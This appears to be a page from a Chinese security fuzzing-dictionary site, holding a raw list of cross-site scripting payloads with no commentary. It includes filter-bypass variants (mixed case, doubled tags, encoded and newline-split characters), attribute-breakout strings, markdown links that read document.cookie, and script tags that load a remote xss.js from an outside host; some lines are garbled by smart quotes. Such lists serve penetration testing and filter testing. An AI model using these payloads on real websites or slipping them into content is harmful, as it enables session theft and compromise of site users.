Home
/
fuzz
返回主页
Fuzz瀛楀吀
XXEDicts
apiDict
ctfDict
directoryDicts
easyXssPayload
images
js
lotDict
paramDict
passwordDict
payload瀛楀吀
rcePayloads
routerDicts
spring
sqlDict
ssrfDicts
subdomainDicts
uploadFileExtDicts
userNameDict
鍙傛暟瀛楀吀
鐢ㄦ埛鍚嶅拰瀵嗙爜
``` <script>a=window.atob('PGgxPjEyMzwvaDE+');document.write(a)</script> <script>var xss = window.alert;xss(1)</script> ``` ``` [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) )\ <javascript:prompt(document.cookie)> \ [citelol]: (javascript:prompt(document.cookie)) ``` ``` <svg><svg x=">" onload=alert(1)> <marquee loop=1 width=0 onfinish=alert`1`>XSS</marquee> ``` ``` <marquee loop=1 width=0 onfinish=co\u006efirm(document.cookie)>1</marquee> ``` ``` <script>alert(1)</script> <svg/onload=alert('XSS')> ``` ``` "><script>alert(1)</script> ``` ``` ' onclick=alert(1) ' onmouseover=alert(1) ``` ``` " onclick=alert(1) " onmouseover=alert(1) ``` ``` "><iframe src=javascript:alert(1)> "> <a href="javascript:alert(1)">bmjoker</a> "> <a href="javascript:%61lert(1)">bmjoker</a> // ``` ``` <BODY ONLOAD=alert('XSS')> "> <Script>alert(1)</script> "> <img Src=x OnError=alert(1)> "><a HrEf="javascript:alert(1)">bmjoker</a> "><svg x=" " Onclick=alert(1)> "><ScriPt>alert(1)<sCrIpt>" " OncliCk=alert(1) ``` ``` "><sscriptcript>alert(1)</sscriptcript> " oonnmouseover=alert(1) "><a hrhrefef=javascriscriptpt:alert(1)>bmjoker ``` ``` javascript:alert(1) javascript:%61lert(1) javascript:alert`1` javascript:alert`1 ``` ``` javascript:alert(1)//http://xxx.com javascript:%0dhttp://xxx.com%0dalert(1) javascript:%0ahttp://xxx.com%0dalert(1) ``` ``` t_sort="type="text" onclick = "alert(1) t_sort="type="text" onmouseover="alert(1) "type="text" onclick = "alert(1)">\\ ``` ``` Cookie: " onmouseover=alert(1) type="text" Cookie: " onclick="alert(1) type="text" ``` ``` <img%0Dsrc=1%0Donerror=alert(1)> <iframe%0asrc=x%0donmouseover=alert`1`></iframe> <svg%0aonload=alert`1`></svg> ``` ```html <!-- <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> <IMG SRC=javascript:alert(‘XSS’)> <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> <<SCRIPT>alert(“XSS”);//<</SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://3w.org/XSS.html < <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> \”;alert(‘XSS’);// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <INPUT SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <BGSOUND SRC=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS <META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert(‘XSS’);”> <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET> <TABLE BACKGROUND=”javascript:alert(‘XSS’)”> <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”> <DIV STYLE=”width: expression_r(alert(‘XSS’));”> <IMG STYLE=”xss:expression_r(alert(‘XSS’))”> <XSS STYLE=”xss:expression_r(alert(‘XSS’))”> <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><ACLASS=XSS></A> exppression(alert(“XSS”))’> <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> <BASE HREF=”javascript:alert(‘XSS’);//”> <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED> a=”get”;b=”URL(\”";c=”javascript:”;d=”alert(‘XSS’);\”)”;eval_r(a+b+c+d); <HTML xmlns:xss><?importnamespace=”xss” implementation=”http://3w.org/XSS/xss.htc”><xss:xss>XSS</xss:xss></HTML> <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT> <SCRIPT a=”>”” SRC=”http://3w.org/xss.js”></SCRIPT> <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT> <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT> <A HREF=”http://127.0.0.1/”>XSS</A> <A HREF=”http://3w.org”>XSS</A> <A HREF=”http://3232235521″>XSS</A> <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A> <A HREF=”http://0300.0250.0000.0001″>XSS</A> <A HREF=”htt p://66.000146.0×7.147/”">XSS</A> <A HREF=”//www.google.com/”>XSS</A> <A HREF=”http://google.com/”>XSS</A> <A HREF=”http://www.google.com./”>XSS</A> <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> --> ```
复制
0xShe 网络安全导航 sbbbb.cn